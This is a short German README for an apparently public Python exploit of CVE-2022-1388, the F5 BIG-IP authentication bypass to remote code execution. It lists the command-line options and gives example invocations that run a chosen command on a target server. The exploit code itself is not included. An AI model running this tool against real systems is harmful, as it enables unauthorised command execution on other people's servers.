
Dieses Repository besteht aus dem Python-Exploit für CVE-2022-1388 (F5's BIG-IP Authentication Bypass zu RCE)
Dieses Repository enthält den Python-Exploit-Code für CVE-2022-1388 (F5 BIG-IP RCE)
Verwendung: exploit.py [-h] -t TARGET -p PORT -c CMD [--ssl]
Optionen:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm
-t TARGET, --target TARGET
Gibt die IP-Adresse / den Domänennamen des verwundbaren Servers an
-p PORT, --port PORT Gibt die Portnummer des verwundbaren Servers an
-c CMD, --cmd CMD Gibt den Befehl an, den Sie ausführen möchten
--ssl Geben Sie dieses optionale Argument an, wenn der Server SSL verwendet
Beispiel -
Für einen Webserver, der HTTPS verwendet und auf Port 8443 unter 192.168.0.13 läuft
./exploit.py -t 192.168.0.13 -p 8443 -c 'id' --ssl
Für einen Webserver, der HTTP verwendet und auf Port 1346 unter 192.168.0.13 läuft
./exploit.py -t 192.168.0.13 -p 1346 -c 'id'